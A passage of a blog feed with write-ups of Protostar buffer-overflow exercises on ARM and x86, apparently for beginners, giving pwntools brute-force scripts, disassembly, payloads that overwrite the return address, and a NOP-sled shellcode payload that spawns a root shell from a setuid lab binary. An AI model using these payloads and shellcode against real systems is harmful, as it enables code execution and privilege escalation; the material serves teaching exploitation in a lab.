class="o">=</span> <span class="n">process</span><span class="p">.</span><span class="n">recv</span><span class="p">().</span><span class="n">decode</span><span class="p">()</span> <span class="k">print</span><span class="p">(</span><span class="s">'res ='</span><span class="p">,</span> <span class="n">res</span><span class="p">)</span> <span class="n">process</span><span class="p">.</span><span class="n">close</span><span class="p">()</span> <span class="k">if</span> <span class="s">'congratulations'</span> <span class="ow">in</span> <span class="n">res</span><span class="p">:</span> <span class="k">break</span> <span class="n">socket</span><span class="p">.</span><span class="n">close</span><span class="p">()</span> </code></pre> </div> <p>And there we go, the congratulations output:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>user@Azeria-Lab-VM:~/protoarm/stack1<span class="nv">$ </span>./exploit.py <span class="o">[</span>+] Connecting to 192.168.0.1 on port 22: Done <span class="o">[</span><span class="k">*</span><span class="o">]</span> root@192.168.0.1: Distro Debian testing OS: linux Arch: arm Version: 4.9.0 ASLR: Enabled <span class="nb">test </span>61 <span class="o">[</span>+] Starting remote process <span class="s1">'/root/protostarm/stack1/stack1'</span> on 192.168.0.1: pid 1585 res <span class="o">=</span> nope <span class="o">[</span><span class="k">*</span><span class="o">]</span> Stopped remote process <span class="s1">'stack1'</span> on 192.168.0.1 <span class="o">(</span>pid 1585<span class="o">)</span> <span class="nb">test </span>62 <span class="o">[</span>+] Starting remote process <span class="s1">'/root/protostarm/stack1/stack1'</span> on 192.168.0.1: pid 1589 res <span class="o">=</span> nope <span class="o">[</span><span class="k">*</span><span class="o">]</span> Stopped remote process <span class="s1">'stack1'</span> on 192.168.0.1 <span class="o">(</span>pid 1589<span class="o">)</span> <span class="nb">test </span>63 <span class="o">[</span>+] Starting remote process <span class="s1">'/root/protostarm/stack1/stack1'</span> on 192.168.0.1: pid 1593 res <span class="o">=</span> nope <span class="o">[</span><span class="k">*</span><span class="o">]</span> Stopped remote process <span class="s1">'stack1'</span> on 192.168.0.1 <span class="o">(</span>pid 1593<span class="o">)</span> <span class="nb">test </span>64 <span class="o">[</span>+] Starting remote process <span class="s1">'/root/protostarm/stack1/stack1'</span> on 192.168.0.1: pid 1597 res <span class="o">=</span> congratulations <span class="o">[</span><span class="k">*</span><span class="o">]</span> Stopped remote process <span class="s1">'stack1'</span> on 192.168.0.1 <span class="o">(</span>pid 1597<span class="o">)</span> <span class="o">[</span><span class="k">*</span><span class="o">]</span> Closed connection to <span class="s1">'192.168.0.1'</span> </code></pre> </div> <p>Again, we bruteforced the correct offset but it can be found by reading at the disassembly:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>00000564 &lt;main&gt;: epilog: 564: b580 push {r7, lr} 566: b094 sub sp, #80 ; 0x50 ; reserve 0x50 bytes for the stack 568: af00 add r7, sp, #0 ; r7 = sp 56a: 6078 str r0, [r7, #4] ; r0 = argv[0] 56c: 6039 str r1, [r7, #0] ; r1 = argc 56e: 687b ldr r3, [r7, #4] 570: 2b01 cmp r3, #1 572: d105 bne.n 580 &lt;main+0x1c&gt; error: 574: 4b13 ldr r3, [pc, #76] ; (5c4 &lt;main+0x60&gt;) 576: 447b add r3, pc 578: 4619 mov r1, r3 57a: 2001 movs r0, #1 ; EXIT_FAILURE 57c: f7ff ef5e blx 43c &lt;errx@plt&gt; read_and_compare_input: 580: 2300 movs r3, #0 582: 64fb str r3, [r7, #76] 584: 683b ldr r3, [r7, #0] 586: 3304 adds r3, #4 588: 681a ldr r2, [r3, #0] ; r2 = argv[1] 58a: f107 030c add.w r3, r7, #12 ; r3 = buffer of 76-12=64 bytes 58e: 4611 mov r1, r2 590: 4618 mov r0, r3 592: f7ff ef3c blx 40c &lt;strcpy@plt&gt; ; strcpy(buffer, argv[1]); 596: 6cfa ldr r2, [r7, #76] ; r2 = vulnerable 598: f246 3364 movw r3, #47806 ; set lower bits of r3 to 0xbabe 59c: f2c6 1362 movt r3, #51966 ; se higher bits fo r3 to 0xcafe 5a0: 429a cmp r2, r3 ; vulnerable == 0xcafebabe? 5a2: d105 bne.n 5b0 &lt;main+0x4c&gt; good_boy: 5a4: 4b08 ldr r3, [pc, #32] ; (5c8 &lt;main+0x64&gt;) 5a6: 447b add r3, pc 5a8: 4618 mov r0, r3 5aa: f7ff ef36 blx 418 &lt;puts@plt&gt; ; puts("congratulations\n"); jump_to_epilog: 5ae: e004 b.n 5ba &lt;main+0x56&gt; bad_boy: 5b0: 4b06 ldr r3, [pc, #24] ; (5cc &lt;main+0x68&gt;) 5b2: 447b add r3, pc 5b4: 4618 mov r0, r3 5b6: f7ff ef30 blx 418 &lt;puts@plt&gt; ; puts ("nope\n"); epilog: 5ba: 2300 movs r3, #0 5bc: 4618 mov r0, r3 ; return 0; 5be: 3750 adds r7, #80 ; 0x50 5c0: 46bd mov sp, r7 5c2: bd80 pop {r7, pc} literal pool: 5c4: 000000a6 5c8: 0000008a 5cc: 0000008e </code></pre> </div> security challenge beginners hextrace Wed, 27 Jan 2021 21:19:57 +0000 https://dev.to/hextrace/a-simple-arm-buffer-overflow-5ah0 https://dev.to/hextrace/a-simple-arm-buffer-overflow-5ah0 <p>Let's get started with binary exploitation on ARM systems. This challenge is based on the 'protostar' series.</p> <p>This is our vulnerable program:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight c"><code><span class="cp">#include &lt;stdio.h&gt; </span> <span class="kt">int</span> <span class="nf">main</span><span class="p">()</span> <span class="p">{</span> <span class="k">volatile</span> <span class="kt">int</span> <span class="n">modified</span><span class="p">;</span> <span class="kt">char</span> <span class="n">buffer</span><span class="p">[</span><span class="mi">64</span><span class="p">];</span> <span class="n">modified</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">gets</span><span class="p">(</span><span class="n">buffer</span><span class="p">);</span> <span class="k">if</span> <span class="p">(</span><span class="n">modified</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">)</span> <span class="n">printf</span><span class="p">(</span><span class="s">"modified: %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">modified</span><span class="p">);</span> <span class="k">else</span> <span class="n">printf</span><span class="p">(</span><span class="s">"nope"</span><span class="p">);</span> <span class="p">}</span> </code></pre> </div> <p>The goal is to abuse the unsafe <code>gets</code> function to modify the <code>modified</code> variable.<br> Both <code>buffer</code> and <code>modified</code> are on the stack. A <code>buffer</code> overflow will overwrite the <code>modified</code> variable.<br> We can use <code>pwntools</code> to find the correct offset:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1">#!/usr/bin/env python3 </span> <span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span> <span class="c1"># ssh into the ARM box </span><span class="n">socket</span> <span class="o">=</span> <span class="n">ssh</span><span class="p">(</span><span class="n">host</span><span class="o">=</span><span class="s">'192.168.0.1'</span><span class="p">,</span> <span class="n">user</span><span class="o">=</span><span class="s">'root'</span><span class="p">,</span> <span class="n">password</span><span class="o">=</span><span class="s">''</span><span class="p">)</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span> <span class="k">while</span> <span class="bp">True</span><span class="p">:</span> <span class="n">i</span> <span class="o">+=</span> <span class="mi">1</span> <span class="k">print</span><span class="p">(</span><span class="s">'test'</span><span class="p">,</span> <span class="n">i</span><span class="p">)</span> <span class="n">payload</span> <span class="o">=</span> <span class="s">'A'</span> <span class="o">*</span> <span class="n">i</span> <span class="n">process</span> <span class="o">=</span> <span class="n">socket</span><span class="p">.</span><span class="n">process</span><span class="p">(</span><span class="s">'/root/protostarm/stack0/stack0'</span><span class="p">)</span> <span class="n">process</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span> <span class="n">res</span> <span class="o">=</span> <span class="n">process</span><span class="p">.</span><span class="n">recv</span><span class="p">().</span><span class="n">decode</span><span class="p">()</span> <span class="n">process</span><span class="p">.</span><span class="n">close</span><span class="p">()</span> <span class="k">if</span> <span class="s">'nope'</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">res</span><span class="p">:</span> <span class="k">print</span><span class="p">(</span><span class="s">'i ='</span><span class="p">,</span> <span class="n">i</span><span class="p">)</span> <span class="k">print</span><span class="p">(</span><span class="n">res</span><span class="p">)</span> <span class="k">break</span> <span class="n">socket</span><span class="p">.</span><span class="n">close</span><span class="p">()</span> </code></pre> </div> <p>After a while we have:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="o">[</span>+] Connecting to 192.168.0.1 on port 22: Done <span class="o">[</span><span class="k">*</span><span class="o">]</span> root@192.168.0.1: Distro Debian testing OS: linux Arch: arm Version: 4.9.0 ASLR: Enabled <span class="nb">test </span>0 <span class="o">[</span>...] <span class="nb">test </span>64 <span class="o">[</span>+] Starting remote process <span class="s1">'/root/protostarm/stack0/stack0'</span> on 192.168.0.1: pid 1623 <span class="o">[</span><span class="k">*</span><span class="o">]</span> Stopped remote process <span class="s1">'stack0'</span> on 192.168.0.1 <span class="o">(</span>pid 1623<span class="o">)</span> <span class="nb">test </span>65 <span class="o">[</span>+] Starting remote process <span class="s1">'/root/protostarm/stack0/stack0'</span> on 192.168.0.1: pid 1627 <span class="o">[</span><span class="k">*</span><span class="o">]</span> Stopped remote process <span class="s1">'stack0'</span> on 192.168.0.1 <span class="o">(</span>pid 1627<span class="o">)</span> i <span class="o">=</span> 65 modified : 65 <span class="o">[</span><span class="k">*</span><span class="o">]</span> Closed connection to <span class="s1">'192.168.0.1'</span> </code></pre> </div> <p>We successfully changed the <code>modified</code> variable by entering 65 A's into the <code>buffer</code>.</p> <p>Now let's have a look at the disassembly so we can understand why it's 65:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>00000538 &lt;main&gt;: 538: b580 push {r7, lr} ; save r7 and lr ; r7: saved frame pointer in thumb mode ; lr: saved instruction pointer (Link Register) 53a: b092 sub sp, #72 ; 0x48 ; reserve stack space 53c: af00 add r7, sp, #0 ; r7 = sp + 0 53e: 2300 movs r3, #0 ; r3 = 0 540: 647b str r3, [r7, #68] ; 0x44 ; modified = r3 542: 1d3b adds r3, r7, #4 ; r3 points to buffer 544: 4618 mov r0, r3 ; r0 = r3 546: f7ff ef58 blx 3f8 &lt;gets@plt&gt; ; gets(&amp;buffer); 54a: 6c7b ldr r3, [r7, #68] ; 0x44 ; r3 = modified 54c: 2b00 cmp r3, #0 ; modified == 0 ? 54e: d007 beq.n 560 &lt;main+0x28&gt; 550: 6c7b ldr r3, [r7, #68] ; 0x44 552: 4619 mov r1, r3 ; r1 = modified (2nd argument) 554: 4b07 ldr r3, [pc, #28] ; (574 &lt;main+0x3c&gt;) 556: 447b add r3, pc 558: 4618 mov r0, r3 ; r0 = "modified: %d\n" (1st argument) 55a: f7ff ef48 blx 3ec &lt;printf@plt&gt; ; printf("modified: %d\n", modified); 55e: e004 b.n 56a &lt;main+0x32&gt; 560: 4b05 ldr r3, [pc, #20] ; (578 &lt;main+0x40&gt;) 562: 447b add r3, pc 564: 4618 mov r0, r3 ; r0 = r3 (load first arg) 566: f7ff ef42 blx 3ec &lt;printf@plt&gt; ; printf("nope"); 56a: 2300 movs r3, #0 ; init r3 56c: 4618 mov r0, r3 ; r0 = r3 56e: 3748 adds r7, #72 ; 0x48 ; restore stack space 570: 46bd mov sp, r7 ; restore caller stack 572: bd80 pop {r7, pc} ; restore sp/pc 574: 00000072 andeq r0, r0, r2, ror r0 578: 00000076 andeq r0, r0, r6, ror r0 </code></pre> </div> <p>Stack is 72 bytes long and organized this way:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>+++ | modified 00 | | modified 00 | | modified 00 | | modified 00 | | buffer[63] | i = 64 | | | [...] | | | | buffer[0] | i = 1 -------- </code></pre> </div> <p><code>gets</code> appends a null terminator so it needs 65 A's to modify the variable. If we initially set <code>modified</code> to 1, it only needs 64 A's.</p> security beginners challenge hextrace Sun, 10 Jan 2021 14:49:41 +0000 https://dev.to/hextrace/jump-into-local-shellcode-protostar-stack5-57mb https://dev.to/hextrace/jump-into-local-shellcode-protostar-stack5-57mb <h2> Analysis </h2> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>root@protostar:/opt/protostar/bin# file stack5 stack5: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.18, not stripped root@protostar:/opt/protostar/bin# gdb -q stack5 (gdb) disas main Dump of assembler code for function main: 0x080483c4 &lt;main+0&gt;: push %ebp 0x080483c5 &lt;main+1&gt;: mov %esp,%ebp 0x080483c7 &lt;main+3&gt;: and $0xfffffff0,%esp 0x080483ca &lt;main+6&gt;: sub $0x50,%esp 0x080483cd &lt;main+9&gt;: lea 0x10(%esp),%eax 0x080483d1 &lt;main+13&gt;: mov %eax,(%esp) 0x080483d4 &lt;main+16&gt;: call 0x80482e8 &lt;gets@plt&gt; 0x080483d9 &lt;main+21&gt;: leave 0x080483da &lt;main+22&gt;: ret End of assembler dump. </code></pre> </div> <p>Let's test some dumb inputs:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>root@protostar:/opt/protostar/bin# python -c "print 'A'*75" | ./stack5 root@protostar:/opt/protostar/bin# python -c "print 'A'*76" | ./stack5 Segmentation fault </code></pre> </div> <p>What about libraries used:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>root@protostar:/opt/protostar/bin# python -c "print 'A'*76" | ltrace ./stack5 __libc_start_main(0x80483c4, 1, 0xbffffd74, 0x80483f0, 0x80483e0 &lt;unfinished ...&gt; gets(0xbffffc80, 0xb7ec6165, 0xbffffc88, 0xb7eada75, 0xb7fd7ff4) = 0xbffffc80 --- SIGSEGV (Segmentation fault) --- +++ killed by SIGSEGV +++ </code></pre> </div> <p>Ok fine, <code>gets</code> is a dangerous function and shouln't be used. Let's figure out why.</p> <h2> Exploitation </h2> <p>Let's prepare a crash dump:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>root@protostar:/opt/protostar/bin# ulimit -c unlimited root@protostar:/opt/protostar/bin# printf 1 &gt; /proc/sys/fs/suid_dumpable root@protostar:/opt/protostar/bin# python -c "print 'A'*76" | ./stack5 Segmentation fault (core dumped) root@protostar:/opt/protostar/bin# file /tmp/core.11.stack5.1915 /tmp/core.11.stack5.1915: ELF 32-bit LSB core file Intel 80386, version 1 (SYSV), SVR4-style, from './stack5' </code></pre> </div> <p>Now we open the crash dump and inspect the stack:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>root@protostar:/opt/protostar/bin# gdb -q -c /tmp/core.11.stack5.1915 Core was generated by `./stack5'. Program terminated with signal 11, Segmentation fault. #0 0xb7eadc03 in ?? () (gdb) x/40x $esp-80 0xbffffc8c: 0xb7eada75 0x41414141 0x41414141 0x41414141 0xbffffc9c: 0x41414141 0x41414141 0x41414141 0x41414141 0xbffffcac: 0x41414141 0x41414141 0x41414141 0x41414141 0xbffffcbc: 0x41414141 0x41414141 0x41414141 0x41414141 0xbffffccc: 0x41414141 0x41414141 0x41414141 0x41414141 0xbffffcdc: 0x41414141 0x00000001 0xbffffd84 0xbffffd8c 0xbffffcec: 0xb7fe1848 0xbffffd40 0xffffffff 0xb7ffeff4 0xbffffcfc: 0x08048232 0x00000001 0xbffffd40 0xb7ff0626 0xbffffd0c: 0xb7fffab0 0xb7fe1b28 0xb7fd7ff4 0x00000000 0xbffffd1c: 0x00000000 0xbffffd58 0x130bb1dd 0x394a07cd (gdb) </code></pre> </div> <p>We're going to write some code on the stack and use <strong>eip</strong> to jump into it.<br> We can help ourselves with a 'nop sled' (consecutive nop opcodes) to find the entrypoint more easily:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>root@protostar:/opt/protostar/bin# python -c "print 'A'*76+'\xe8\xfc\xff\xbf'+'\x90'*20+'\x31\xc0\x31\xdb\xb0\x06\xcd\x 80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\ xe1\x99\xb0\x0b\xcd\x80'" &gt; payload root@protostar:/opt/protostar/bin# cat payload | ./stack5 # id uid=0(root) gid=0(root) groups=0(root) </code></pre> </div> <p>This payload fills the buffer with 76 <strong>A</strong>'s, then overwrites the instruction<br> pointer with <code>0xbffffce8</code> which is somewhere in our following nop sled of <strong>0x90</strong>'s<br> and then our shellcode spawning a shell.</p> security beginners hacking hextrace Fri, 11 Dec 2020 23:55:45 +0000 https://dev.to/hextrace/rewrite-instruction-pointer-protostar-stack4-anh https://dev.to/hextrace/rewrite-instruction-pointer-protostar-stack4-anh <p>This is the 5th exercise of the protostar series. This is about exploiting a buffer overflow to rewrite the instruction pointer.</p> <p>Here is the source we're about to exploit.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>#include &lt;stdlib.h&gt; #include &lt;unistd.h&gt; #include &lt;stdio.h&gt; #include &lt;string.h&gt; void win() { printf("code flow successfully changed\n"); } int main(int argc, char **argv) { char buffer[64]; gets(buffer); } </code></pre> </div> <p>Ok so now we only have a <code>gets()</code> that reads our input and a <code>win</code> function lying in virtual address space that doesn't get called. Can we find a way to call it? Sure!</p> <p><code>fgets</code> is vulnerable to overflow. Our destination buffer is 64 bytes long. If we overflow it, we're going to overwrite the stack. There is some useful values lying on stack, on top of our buffer: the previous stack pointer (actual base pointer but also the previous next instruction pointer). This next instruction pointer (IP) will be used to fetch the instruction following our function call. Here, <code>main</code> gets called by some library wrapper function but there is some code after <code>main</code> that we can change due to the overflow vulnerability.</p> <p>We can use <code>nm</code> as previously shown to discover <code>win</code> address:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>root@protostar:/opt/protostar/bin# nm stack4 | grep win 080483f4 T win </code></pre> </div> <p>Now we have to find the instruction pointer backup lying on stack. To do so, we can craft the follwing payload, increasing the overflow length to properly jump on <code>win</code>:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>buffer + overflow + win address </code></pre> </div> <p>We end up with the following:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>root@protostar:/opt/protostar/bin# python -c "print('A'*64 + 'B' * 12 + '\xf4\x83\x04\x08')" | ./stack4 code flow successfully changed Segmentation fault </code></pre> </div> <p>We successfully called <code>win</code> but this ended up with a <strong>segmentation fault</strong> because <code>win</code> stack frame couldn't have been set up properly. </p> <h2> Links </h2> <ul> <li><a href="https://en.wikipedia.org/wiki/Function_prologue">https://en.wikipedia.org/wiki/Function_prologue</a></li> <li><a href="https://www.cgsecurity.org/exploit/P55-08">https://www.cgsecurity.org/exploit/P55-08</a></li> </ul>